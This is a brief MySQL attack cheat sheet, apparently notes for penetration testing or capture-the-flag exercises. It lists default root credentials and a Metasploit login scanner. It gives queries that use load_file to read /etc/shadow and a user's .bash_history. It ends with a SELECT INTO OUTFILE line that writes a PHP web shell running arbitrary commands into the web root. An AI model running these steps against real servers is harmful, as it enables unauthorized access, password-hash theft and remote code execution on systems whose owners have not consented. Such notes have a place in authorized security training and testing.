Default creds root:root or root:<blank>
Metasploit’s mysql_login auxiliary module can scan
mysql –u [username] –h [hostname/IP] –p [leaveBlank]
– Data mine important files: select load_file("/etc/shadow"); select load_file(“/home/username/.bash_history”);
show databases; show tables; describe tablename; select * from tablename;
Useful mostly for CTFs:
select "<?php echo system($_GET['cmd']);?>" into outfile /var/www/html/directory/shell.php